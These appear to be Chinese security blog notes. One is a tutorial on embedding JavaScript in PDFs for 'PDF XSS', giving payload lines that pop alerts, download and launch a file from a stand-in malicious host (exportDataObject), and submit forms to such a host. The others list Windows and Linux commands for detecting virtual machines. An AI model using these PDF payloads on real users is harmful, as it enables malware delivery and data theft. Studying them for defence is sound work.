PDF XSS攻击总结 1. 工具地址https://www.xunjiepdf.com/editor2. 制作教程进入工具，依次点击文件 -> 新建文档 -> 从空白页然后再次点击文件 -> 文档属性点击JavaScript -> 添加在编辑器中添加如下代码：app.alert("TNT");保存后即可在浏览器中看到弹窗3. 常用的JavaScript注入攻击函数通过弹出恶意警告框来干扰用户或欺骗用户app.alert("恶意代码");通过导出数据对象来触发恶意文件的下载或执行this.exportDataObject({ cName: "恶意文件", nLaunch: 2, cDIPath: "http://恶意网站/恶意文件" });通过提交表单来触发恶意脚本的执行this.submitForm({ cURL: "http://恶意网站/恶意脚本" });4. 变种漏洞的总结除了基本的PDF XSS，还存在一些变种漏洞，下面是关于这些变种漏洞的总结：JavaScript注入 这种变种漏洞利用PDF文件中的JavaScript功能，攻击者可以将恶意的JavaScript代码嵌入到PDF文件中，当用户打开PDF文件时，恶意脚本会被执行。这种漏洞可以用于执行各种恶意操作，如窃取用户的敏感信息、修改用户的数据等。PDF链接跳转 这种变种漏洞利用PDF文件中的链接跳转功能，攻击者可以在PDF文件中创建一个看似正常的链接，但实际上是指向一个恶意网站的链接。当用户点击这个链接时，会被重定向到恶意网站，从而可能遭受钓鱼攻击或下载恶意软件。PDF表单攻击 这种变种漏洞利用PDF文件中的表单功能，攻击者可以在PDF文件中创建一个看似正常的表单，但实际上其中的字段可能包含恶意脚本代码。当用户填写表单并提交时，恶意脚本会被执行，从而可能导致数据泄露或其他恶意操作。PDF文件解析漏洞 这种变种漏洞利用PDF阅读器的解析漏洞，攻击者可以通过构造特定的PDF文件，利用解析漏洞来执行恶意操作。这种漏洞通常需要PDF阅读器的相关软件供应商发布安全补丁来修复。

Windows下如何判断服务器是虚拟机还是物理机 1. Systeminfo命令Systeminfo命令是windows系统中显示系统信息的命令，此命令可以显示出计算机的操作系统的详细配置信息，包括操作系统配置、安全信息、产品ID和硬件属性（如 RAM、磁盘空间和网卡）。cmd使用以下命令：systeminfo2. Get-WmiObject命令powershell使用Get-WmiObject命令来获取电源，服务，进程，系统，网络IP等。powershell使用以下命令：get-wmiobject win32_computersystem3. 总结以上总结了2种判断Windows服务器是虚拟机还是物理机的方法，不一定准确，仅供参考，当然也可能还有其他更好的方法。欢迎补充！

Linux下如何判断服务器是虚拟机还是物理机 1. dmesg命令dmesg命令显示linux内核的环形缓冲区信息，我们可以从中获得诸如系统架构、cpu、挂载的硬件，RAM等多个运行级别的大量的系统信息。使用以下命令：dmesg | grep -i hypervisor2. dmidecode命令dmidecode命令可以获取有关系统硬件的详细信息，包括制造商信息。虚拟机通常会在制造商信息中显示虚拟化平台的名称。在终端中运行以下命令：dmidecode -s system-product-name3. lscpu命令lscpu命令在Linux下输出与系统CPU相关的信息。此命令从/proc/cpuinfo和sysfs文件中检索CPU的体系结构（线程、CPU高速缓存、CPU 系列型号、内核、CPU数量等）信息，并将其显示在终端中。使用以下命令：lscpu | grep Hypervisor4. lscpi命令lspci命令是用于列出所有PCI总线上的设备信息，输出结果包括：设备的类别、型号、厂商、状态、IRQ等信息。输出结果的每一行对应一个设备，通常默认按照总线、设备号、功能号的顺序排列。使用以下命令：lspci | grep -i virtual5. lshw命令lshw命令收集关于主机的硬件(比如处理器、磁盘、内存和USB控制器等)和配置大量信息。使用以下命令：lshw -class system6. systemd-detect-virt命令systemd-detect-virt用于检测系统的运行环境是否为虚拟化环境，以及更进一步检测是哪种虚拟化环境，比如是哪种虚拟机或哪种容器。使用以下命令：systemd-detect-virt7. virt-what命令virt-what实际上是一个Shell脚本。它通过各种启发式方法来识别虚拟化环境类型，可以检测出QEMU/KVM、VMware、Hyper-V、VirtualBox、OpenVZ/Virtuozzo、Xen、LXC、IBM PowerVM以及Parallels等平台类型。使用以下命令：virt-what8. 检查/sys文件系统在/sys文件系统中有一个文件可以帮助你确定系统是虚拟机还是物理机。使用以下命令：cat /sys/class/dmi/id/product_name9. 总结以上总结了8种判断Linux服务器是虚拟机还是物理机的方法，不一定准确，仅供参考，当然也可能还有其他更好的方法。欢迎补充！